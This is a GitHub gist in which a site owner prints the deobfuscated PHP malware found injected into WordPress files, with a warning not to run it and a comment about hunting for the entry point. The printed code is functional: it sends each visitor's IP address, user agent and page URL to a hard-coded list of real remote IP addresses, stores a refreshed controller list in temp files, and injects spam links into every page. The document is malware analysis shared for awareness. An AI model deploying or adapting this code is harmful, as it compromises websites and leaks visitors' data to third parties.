Skip to content

Instantly share code, notes, and snippets.

@gMagicScott

gMagicScott/gist:8107042

Last active January 1, 2016 06:49
Show Gist options
  • Save gMagicScott/8107042 to your computer and use it in GitHub Desktop.
Save gMagicScott/8107042 to your computer and use it in GitHub Desktop.
Download ZIP
Decoding PHP injection on WordPress files. **!! Do NOT run this code on your machine !!**
Raw
gistfile1.php
<?php
/**
* There are layers of protection to check a few things
* - Only run this code once
* - Only run when accessed by Google, MSN, or Yahoo!
*
* I removed those checks to make this more readable
*/
/**
* Find path to system's temporary directory
*
* @return string Full path to system temp
*/
function t_dir() {
if ( function_exists( "sys_get_temp_dir" ) ) {
if ( @is_writeable( sys_get_temp_dir() ) ) {
return realpath(sys_get_temp_dir());
}
}
if ( !empty( $_ENV["TMP"] ) && @is_writeable( realpath( $_ENV["TMP"] ) ) ) {
return realpath( $_ENV["TMP"] );
}
if ( !empty( $_ENV["TMPDIR"] ) && @is_writeable( realpath( $_ENV["TMPDIR"] ) ) ) {
return realpath( $_ENV["TMPDIR"] );
}
if ( !empty( $_ENV["TEMP"]) && @is_writeable( realpath( $_ENV["TEMP"] ) ) ) {
return realpath( $_ENV["TEMP"] );
}
/**
* tempnam — Create file with unique file name
*
* `tempnam ( string $dir , string $prefix )`
*
* @var string
*/
$tempfile = @tempnam(__FILE__, "");
if ( @file_exists($tempfile) ) {
@unlink( $tempfile );
if ( @is_writeable( realpath( dirname( $tempfile ) ) ) ) {
return realpath( dirname( $tempfile ) );
}
}
if ( @is_writeable( realpath( @ini_get( "upload_tmp_dir" ) ) ) ) {
return realpath( @ini_get( "upload_tmp_dir" ) );
}
if ( @is_writeable( realpath( session_save_path() ) ) ) {
return realpath( session_save_path() );
}
if ( @is_writeable( realpath( dirname( __FILE__ ) ) ) ) {
return realpath( dirname( __FILE__ ) );
}
return null;
}
function get_t_dir_mass() {
if (function_exists("sys_get_temp_dir")) {
if (@is_writeable(sys_get_temp_dir())) {
$res[] = realpath(sys_get_temp_dir());
}
}
if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) {
$res[] = realpath($_ENV["TMP"]);
}
if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) {
$res[] = realpath($_ENV["TMPDIR"]);
}
if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) {
$res[] = realpath($_ENV["TEMP"]);
}
$tempfile = @tempnam(__FILE__, "");
if (@file_exists($tempfile)) {
@unlink($tempfile);
if (@is_writeable(realpath(dirname($tempfile)))) {
$res[] = realpath(dirname($tempfile));
}
}
if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) {
$res[] = realpath(@ini_get("upload_tmp_dir"));
}
if (@is_writeable(realpath(session_save_path()))) {
$res[] = realpath(session_save_path());
}
if (@is_writeable(realpath(dirname(__FILE__)))) {
$res[] = realpath(dirname(__FILE__));
}
return array_unique($res);
}
function get_know_ip()
{
$know[] = "130.0.233.18";
$know[] = "130.0.237.24";
$know[] = "149.154.154.191";
$know[] = "151.236.17.13";
$know[] = "151.236.18.8";
$know[] = "178.209.52.218";
$know[] = "178.73.210.163";
$know[] = "37.235.53.202";
$know[] = "46.17.57.141";
$know[] = "46.246.93.130";
$know[] = "5.61.45.110";
$know[] = "176.99.6.245";
$know[] = "151.236.25.47";
$know[] = "151.236.28.97";
$know[] = "151.236.26.86";
$know[] = "151.236.20.19";
$know[] = "144.76.178.235";
$know[] = "188.116.23.77";
$know[] = "80.67.12.206";
$know[] = "5.61.38.129";
$know[] = "37.230.118.51";
$know[] = "5.187.5.185";
$know[] = "5.187.1.129";
$know[] = "5.187.4.155";
$know[] = "209.159.153.165";
$know[] = "144.76.178.236";
$know[] = "176.9.193.201";
foreach (get_t_dir_mass() as $t) {
if (file_exists($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA")) {
foreach (file($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA") as $tt) {
$know[] = trim($tt);
}
}
}
return array_unique($know);
}
function save_know_ip($ip)
{
$content = implode(PHP_EOL, $ip);
foreach (get_t_dir_mass() as $t) {
$f = fopen($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA", "w");
fputs($f, $content);
fclose($f);
}
}
function my_get_real_ip()
{
$proxy_headers = array(
"CLIENT_IP",
"FORWARDED",
"FORWARDED_FOR",
"FORWARDED_FOR_IP",
"HTTP_CLIENT_IP",
"HTTP_FORWARDED",
"HTTP_FORWARDED_FOR",
"HTTP_FORWARDED_FOR_IP",
"HTTP_PC_REMOTE_ADDR",
"HTTP_PROXY_CONNECTION",
"HTTP_VIA",
"HTTP_X_FORWARDED",
"HTTP_X_FORWARDED_FOR",
"HTTP_X_FORWARDED_FOR_IP",
"HTTP_X_IMFORWARDS",
"HTTP_XROXY_CONNECTION",
"VIA",
"X_FORWARDED",
"X_FORWARDED_FOR"
);
foreach ($proxy_headers as $proxy_header) {
if (isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])) {
return $_SERVER[$proxy_header];
} else if (stristr(",", $_SERVER[$proxy_header]) !== FALSE) {
$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header])));
if (($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE)
$proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp);
if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp))
return $proxy_header_temp;
}
}
return $_SERVER["REMOTE_ADDR"];
}
function my_get_url()
{
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
if (strpos($url, "?") !== false) {
$url = substr($url, 0, strpos($url, "?"));
}
return $url;
}
function my_get_contents($ip, $page)
{
if (function_exists("curl_init")) {
$ch = curl_init("http://" . $ip . "/" . $page);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
return $ult;
}
if (ini_get("allow_url_fopen")) {
$ult = trim(@file_get_contents("http://" . $ip . "/" . $page));
return $ult;
}
$fp = fsockopen($ip, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $page HTTP/1.0\r\n";
$out .= "Host: $ip\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
return $ult;
}
function my_samui_get_links()
{
$all = get_know_ip();
shuffle($all);
$url = my_get_url();
$real_ip = my_get_real_ip();
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$aid = "1001";
$cod = md5($url . time());
$check = md5($cod);
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
$page = "/slk.php?aid=" . $aid . "&url=" . $url . "&ip=" . $real_ip . "&ua=" . $ua . "&cod=" . $cod;
foreach ($all as $ip) {
$tc = my_get_contents(trim($ip), $page);
$pos = strpos($tc, $check);
if ($pos !== false) {
$proxy_list = substr($tc, 0, $pos);
save_know_ip(explode("\n", $proxy_list));
$links = substr($tc, $pos + 32);
return $links;
}
}
}
/**
* Modify page contents
*
* if the page is HTML, with a `<body>` tag, replace the contents
*/
function my_mod_con($con) {
if ( strpos($con, "<body") !== false ) {
$text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>" . my_samui_get_links(), $con, 1);
return $text;
} else {
return $con;
}
}
/**
* OB Callback
*
* @param string $buf Contents of Output Buffer
* @return Modified page contents, possibly Gzipped
*/
function my_callback( $buf ) {
if ( headers_sent() ) {
if ( in_array( "Content-Encoding: gzip", headers_list() ) ) {
$tmpfname = tempnam( t_dir(), "FOO" );
$zf = fopen( $tmpfname, "w" );
fputs( $zf, $buf );
fclose( $zf );
$zd = gzopen( $tmpfname, "r" );
$contents = gzread( $zd, 10000000 );
$contents = my_mod_con( $contents );
gzclose( $zd );
unlink( $tmpfname );
$contents = gzencode( $contents );
} else {
$contents = my_mod_con( $buf );
}
} else {
$contents = my_mod_con( $buf );
}
return ( $contents );
}
/**
* Start an output buffer, call `my_callback()` on end
*/
ob_start("my_callback");
@gMagicScott
Copy link
Author

I'll stop there. I tried to make a commit per level of eval( base64_decode( $crazyness ) ); but I'm pretty sure I missed a few.

What kills me is I checked through every file & the server logs to see if I could find how it got in. But I very well could have missed a security hole. I filtered through 28 WordPress installed on a single shared hosting account.

Bah!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment